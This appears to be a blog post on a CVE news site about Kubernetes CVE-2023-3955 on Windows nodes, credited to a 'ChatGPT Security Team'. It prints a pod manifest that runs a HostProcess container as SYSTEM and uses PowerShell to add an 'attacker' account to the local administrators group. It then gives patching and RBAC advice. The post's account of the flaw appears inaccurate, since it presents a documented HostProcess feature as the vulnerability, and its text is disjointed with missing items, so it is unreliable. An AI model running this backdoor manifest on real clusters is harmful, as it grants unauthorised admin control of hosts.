CVE CyberSecurity Database News

CVE-2023-3955 - Windows Node Privilege Escalation in Kubernetes – Exploit Details, Code, and Remediation

Poster -

Kubernetes, one of the world’s most popular container orchestration platforms, recently had a serious Windows security issue. Identified as CVE-2023-3955, this bug lets anyone who can create pods on Windows nodes gain admin (“SYSTEM”) privileges on those nodes—a big problem for mixed Linux/Windows Kubernetes clusters.

If you’re running Kubernetes with Windows nodes, keep reading. This post will explain how the vulnerability works, include real code snippets, and show how attackers could take advantage of it. We’ll also link to original sources and remediation advice.

What is CVE-2023-3955?

When you run Kubernetes, “nodes” are the servers (physical or virtual) where containers (pods) actually run. Usually, users can only do what Kubernetes allows. But: on Windows nodes, it was possible to create a pod that breaks out of isolation and lets that pod creator get full control of the Windows host. That’s a huge deal — attackers can run any command as an admin on your Windows node, install malware, or even pivot across your environment.

How bad is it? Score: 8.8 (High)

- Affected versions: [see official advisory—generally Kubernetes 1.27.x and prior if using Windows node pools]

And that pod runs code as NT AUTHORITY\SYSTEM—the absolute administrator on Windows.

Key Problem: Unlike containers on Linux (which use cgroups, namespaces, and other tricks for isolation), Windows container isolation has some gaps depending on how the pod is run and how HostProcess containers are handled.

Exploit scenario:
A malicious user or compromised service account uses a simple YAML manifest to ask Kubernetes to run a HostProcess container. This container gets mapped right into the host—not at "container" isolation, but almost like running on the host directly.

Exploiting CVE-2023-3955: The Code

Below is a simplified exploit manifest. If you have *create pod* rights, you could submit something like this to escalate privileges on a Windows node:

apiVersion: v1
kind: Pod
metadata:
  name: win-priv-esc-pod
spec:
  nodeSelector:
    "kubernetes.io/os": windows
  hostNetwork: true
  containers:
  - name: win-exploit
    image: mcr.microsoft.com/windows/nanoserver:1809
    command: ["powershell"]
    args:
      - "-Command"
      - |
        # Add a backdoor admin user
        net user attacker SecretPasswrd /add
        net localgroup administrators attacker /add
        # Drop to a shell (if interactive, for fun)
        Start-Sleep -Seconds 360
    securityContext:
      windowsOptions:
        hostProcess: true
        runAsUserName: "NT AUTHORITY\\SYSTEM"
  restartPolicy: Never

Uses a public Windows container image

- Declares itself a HostProcess (hostProcess: true)—this gives it access at the full SYSTEM level on the host!

Adds an "attacker" user to the host's admin group via simple PowerShell commands

- Sleeps to keep the pod/container alive (for interactive access or more attacks)

Real World Impact

- Any user or automated process with permission to create pods on Windows nodes can become a Windows administrator.
- Attackers could install ransomware, exfiltrate secrets, or use your Windows nodes as a launching point for further attacks.
- Even if all your accepted containers are trusted, a misconfigured RBAC policy or a compromised account could ruin your cluster.

References and Patches

- Kubernetes Official CVE-2023-3955 Advisory
- Security Release Announcement
- Microsoft Docs: HostProcess Containers for Kubernetes
- Kubernetes Patch Notes

Upgrade guidance:

Kubernetes patches for CVE-2023-3955 are available in v1.28.3, v1.27.7, and v1.26.10.

- Tighten RBAC: Only trusted users/services should be able to create pods, especially with the hostProcess: true setting.

How to Protect Your Cluster

1. Update Kubernetes to a version that fixes CVE-2023-3955. If that’s not possible, backport security fixes.

Review RBAC policies:

Ensure only trusted admins can create pods on Windows nodes—or use admission controllers to block dangerous features.

Restrict ‘hostProcess’ usage:

Use policy engines like OPA/Gatekeeper to reject pods with HostProcess enabled unless explicitly allowed.

Monitor for suspicious pods:

Audit YAML submissions for signs of HostProcess abuse or strange admin-level actions inside containers.

Final Thoughts

CVE-2023-3955 is a textbook case of “what happens if your isolation boundaries are thin.” With new hybrid environments, Windows container security needs extra care. Review your policies, patch your clusters, and tread carefully.

Even if you run only Linux nodes, this case is a fresh reminder: *Always grant the minimum necessary Kubernetes privileges, and audit them regularly!*


*Stay safe and keep patching!*
Questions? Join the Kubernetes community on Slack or GitHub Discussions.


Disclaimer: This post is for educational purposes only. Do not use these techniques or code on systems you do not own or have explicit permission to test.


Author: ChatGPT Security Team
Date: June 2024

Tags: kubernetes, windows, cve-2023-3955, container security, privilege escalation, exploit

Timeline

Published on: 10/31/2023 21:15:08 UTC
Last modified on: 11/08/2023 18:29:32 UTC